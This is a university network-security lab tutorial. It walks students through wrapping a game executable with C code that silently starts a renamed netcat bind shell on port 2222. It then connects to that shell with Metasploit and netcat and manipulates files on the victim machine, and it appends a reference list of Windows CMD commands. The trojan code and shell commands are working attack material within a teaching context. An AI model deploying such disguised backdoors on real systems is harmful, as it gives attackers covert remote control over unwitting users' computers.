Tutorial 7: Trojan horse

 Purpose
On completion of this tutorial, students are expected to understand:
- How to create Trojan horse
- How to exploit Windows 7
 Lab steps
PART A. COMPROMISE A COMPUTER GAME WITH A TROJAN HORSE

1. This lab requires 2 virtual machines:

+ Kali
+ Windows 7
2. Install Guest Addition in Virtual Machines to share files between folders
3. Configure shared folder settings.
On windows 7:
4. Download following files on Windows 7 (available on NSE course tools)
- Snowcraft.rar
- Netcat.exe
- DevC
5. Install DevC+
6. Create a folder named snowcraft
7. Create subfolder name dir inside snowcraft
8. Copy file netcat.exe to dir
9. Copy file snowcraft.exe to dir
10. Rename netcat.exe as chest.exe
11. Open DevC, create a new source code:
#include <stdio.h>
#include <stdlib.h>
int main ()
{ system("start /B dir\\chest.exe -d -L -p 2222 -e cmd.exe /C");
system("dir\\snowcraft.exe");
}

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 12. Save it as snowcraft.cpp to snowcraft folder
13. Build and execute it. You will see snowcraft.exe will appear.

14. Run snowcraft.exe, you will see an CMD together with the game.
Play and enjoy games but now your PC is now opening port 2222 for
attackers!!!!
PART B. EXPLOIT WINDOWS 7

1. Start Up Kali
o Instructions:
o Open terminal, type msfconsole
o Note:
 Metasploit takes about 5 to 20 seconds to start up
2. Set Handler and Payload
o Instructions:
0. use multi/handler
1. set PAYLOAD windows/shell_bind_tcp

3. Set Options, Launch Exploit

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 o Instructions:
0. show options
 LPORT - This is the port of the victim's machine.
 RHOST - This is the IP Address of the victim's machine.

set LPORT 2222

 Remember we are running chest.exe disguished as

NetCat running on port 2222.

set RHOST x.x.x.x

 This is the IP Address of the victim

exploit

4. Set Options, Launch Exploit

o Instructions:
0. Now that Kali is now connect to the Victim's machine using
port 2222.
1. sessions -l
 List all the Metasploit sessions.
2. sessions -i 1
 Use Shell sessions -l

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 Welcome to to the DOS prompt

o Instructions:
0. cd \
1. dir
2. echo "Your Name"
3. date
4. Press <Enter>
o Partial Proof of Lab:
0. Do a PrtScn
1. Paste into a word document

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

PART C. Use Netcat to connect to Netcat

1. Start up a terminal window

o Instructions:
1. Click on the Terminal Window
2. Use Kali's Netcat to connect to the Victim's Netcat

nc -v x.x.x.x 2222

 In your case, x.x.x.x is the Victim's IP address

Or telnet x.x.x.x 2222

To connect to victims

3. Create a new folder: mkdir security

4. Go to security folder: cd security
5. Create a file password.txt that stores the secret information
echo “My pass is 123456” > password.txt

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 And then you added your information here. For example,
Type “Mypass is 123456”. Then press Control + Z to exit
6. Type nc -v x.x.x.x 2222
7. Open to view files

type password.txt

8. Now you already create a files on the victim.

*** Delete a file

del password.txt

*** Delete multiple text files

del *.txt

*** Remove a directory

rmdir security

You could try more with CMD commands in Appendix 1.

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 Appendix 1

CMD Windows
command Description version

bitsadmin Creates and monitors downloads and 10/8/7/Vista

uploads.

break Interrupts Ctrl + C checking in DOS, allowing All Win/DOS

you to stop processes in the old operating
system. Only available for compatibility
reasons in Windows.

call Calls a batch file within another batch file. The All Win/DOS
command has no effect if entered directly into
CMD instead of in a batch file.

cd Displays the current directory and lets you All Win/DOS

switch to other directories. With the
parameter /D plus drive and path
specification, you can also switch drives. Use
cd.. to switch to a higher directory (has the
same function as the chdir command).

chcp Changes the current code page (character set All Win/DOS
table) or shows the page count of the current
code page.

chdir Displays the current directory and lets you All Win/DOS
switch to other directories. With the
parameter /D plus drive and path
specification, you can also switch drives. Use
chdir.. to switch to a higher directory (has the
same function as the cd command).

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

choice Creates a selection list: typical example is the All Win (not
selection of yes (Y) or no (N), which is created XP)/DOS
with /C YN. With the parameter /M you can
add an explanatory message for the user.

clip Forwards the result of a command to the clip) or the 10/

clipboard. For example, you can copy the content of a file 8/7
directory structure (dir (clip < filename) /Vis
to the clipboard. ta

cls Clears the content of the screen. All Win/DOS

cmd Starts CMD.EXE. 10/8/7/Vista/XP

color Changes the background (first value) and text 10/8/7/Vista/XP

color (second value) of the command prompt.
The color lies between 0 (black) and F (white).

command Starts CMD.COM. 32-bit/DOS

date Displays the current date and allows you to All Win/DOS
change it. With the parameter /T the date is
shown without the option to change.

debug Starts debug, a program that can test and 32-bit/DOS

modify programs within the command
prompt.

dir Displays all folders and files within the current All Win/DOS
directory. You can restrict the output by
attributes (/A), simplify the list (/B), or display
all subdirectories and their files (/S).

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

doskey Creates macros, recalls commands, and edits All Win/DOS

command input.

dosshell Opens the DOS shell, a graphical file 95/DOS

management tool. In Windows, the DOS shell
is replaced by Windows Explorer.

echo Displays a message and is mainly used within All Win/DOS

scripts and batch files.

edit Starts the MS-DOS editor, with which you can 32-bit/DOS
create text files.

edlin Creates and edits text files within the 32-bit/DOS

command prompt.

exit Ends CMD.EXE or CMD.COM. All Win/DOS

fasthelp Displays helpful information about DOS

commands.

fastopen Writes the position of a program into a 32-bit/DOS

specified list, which is in the working memory
and should accelerate the start of programs.

find Searches through a file or multiple files for a All Win/DOS

particular character sequence. If you only
want to know how frequently the word or
phrase occurs, use the /C parameter. With the
extension /I the command ignores upper- and
lower-case in the search.

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

findstr Finds character sequences in one or multiple 10/8/7/Vista/XP

files. It gives you more options when
compared to the find command: you can
search for files that contain various terms or
with /C search for an exact word order.

forcedos Starts a program in the MS-DOS partial XP (32-bit)

system, in case it’s not directly recognized by
Windows XP as a DOS program.

graftabl Enables the option to use extended characters 32-bit/DOS

of a specific code page in graphics mode.

graphics Starts a program that can print graphics. 32-bit/DOS

help Displays help text for a specific command All Win/DOS

(you can also use the /? command).

kb16 Changes the country settings of the keyboard 32-bit

for DOS programs (only included in Windows
for compatibility reasons. Replaces the old
command keyb).

keyb Changes the country settings of the keyboard 98/95/DOS

for DOS programs (only included in Windows
for compatibility reasons. Replaced by kb16 in
newer Windows versions).

logoff Logs the user out of Windows. Also allows 10/8/7/Vista/XP

you to end sessions on servers.

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

lpq Displays the status of a printer queue for All Win

computers that use a “line Printer Daemon”
(LPD). (To use the command in Windows 10,
8, 7, or Vista, the LPD print service and the
LPR port monitor have to be enabled first).

lpr Sends a file to a computer that uses a line All Win

printer daemon (LPD). To use the command in
Windows 10, 8, 7, or Vista, the LPD print
service and LPR port monitor have to be
enabled first.

md Creates a new directory on the specified path. All Win/DOS

If directories don’t already exist on the path,
md creates them automatically (you can also
use the mkdir command).

mkdir Creates a new directory on the specified path. All Win/DOS

If directories don’t already exist on the path,
mkdir creates them automatically (you can
also use the md command).

more Outputs the content of a file (for example, a All Win/DOS

text file) by the page. You can also use the
command to split the output of another
command into pages.

msg Sends a message to another user. You can 10/8/7/Vista/XP

write the username into the command or
create files in which usernames are saved. The
files can then be included in the command
with @filename.

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

nlsfunc Provides country-specific information for 32-bit/DOS

language support.

ntbackup Runs backup services directly from the XP

command line or as part of batch or script
files.

path Creates and displays the path for searching All Win/DOS
executable files.

pause Pauses execution in batch files and scripts. All Win/DOS

The user is then prompted in a message to
continue by pressing a key.

popd Changes to the folder saved by the pushd 10/8/7/Vista

command. The command is mainly part of
batch files and scripts.

print Prints a text file. The device to be used for All Win/DOS
printing has to be specified.

prompt Changes the display of the command prompt. All Win/DOS

pushd Saves a specific path into a script or batch file. 10/8/7/Vista/XP

You can change to this directory with popd.

qbasic Starts qbasic, a program environment based 98/95/DOS

on the BASIC programming language.

rd Deletes a directory. This must not contain any All Win/DOS

files, even hidden ones. You can delete an

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

entire directory tree with the /S parameter

(you can also use the rmdir command).

rem Writes comments in batch and script files that All Win/DOS
aren’t taken into account when executing.

rmdir Deletes a directory. This must not contain any All Win/DOS
files, even hidden ones. You can delete an
entire directory tree with the /S parameter
(you can also use the rd command).

runas Allows a user to run commands with the 10/8/7/Vista/XP

rights of another user. For example, you can
run a command as an administrator from a
normal user account as long as you know the
password.

scandisk Starts Microsoft ScanDisk. The program 98/95/DOS

searches data carriers for errors.

schtasks Sets the execution of specified programs and 10/8/7/Vista/XP

commands for a specified point in time. You
can create, delete, change, and display all
scheduled tasks.

set Displays environmental variables of CMD.EXE All Win/DOS

and lets you configure them.

shift Moves variables within batch files and scripts. All Win/DOS

shutdown Shuts down the computer (/s), triggers a 10/8/7/Vista/XP

restart (/r), or logs the user out (/l). A

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

graphical user interface is displayed if you

enter the parameter /I as the first option in
the command.

sort Lists out data (from a file or command) and All Win/DOS
outputs it again sorted – directly in the
command prompt, in a new file, or in another
output.

start Opens a new command prompt window in All Win

which you can run a specific program or
command.

subst Assigns a drive letter to a path to create a All Win/DOS

virtual drive.

taskkill Ends one or more running tasks. You either 10/8/7/Vista

have to specify the process ID (PID) or image
name.

tasklist Lists all running processes – also on remote 10/8/7/Vista/XP

computers, if desired. The process ID also has
to be specified, which is required for the
taskkill command, for example.

time Displays the current time and allows it to be All Win/DOS

changed. If the parameter /T is entered, the
command prompt only shows the time and
offers no option to directly change it.

timeout Stops a process for a specified time. The 10/8/7/Vista

command Is used in batch files and scripts. If

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung

 CMD Windows
command Description version

you use the /NOBREAK parameter, the

command ignores any keyboard input.

title Changes the title of the command prompt. All Win/DOS

Spaces are allowed, but not all special
characters such as a slash, for example,
because they may be interpreted as
instructions for a parameter.

tree Graphically displays the directory structure of All Win/DOS

a drive or path. With the /F parameter, all files
in the folders are also listed out. /A also
ensures that only ASCII characters are used
for the graphical representation. The
command takes into account all
subdirectories starting from the given path. If
you don’t enter a path, the current folder is
used as the output.

type Displays the content of a text file. All Win/DOS

tzutil Displays the currently set time zone (/g) or 10/8/7

changes it (/s). The parameter /l helps
determine the valid time zones.

ver Displays the current version number of All Win/DOS

Windows or MS-DOS.

FIT|HANU|NSE 2021 Instructor: Vuong Thi Nhung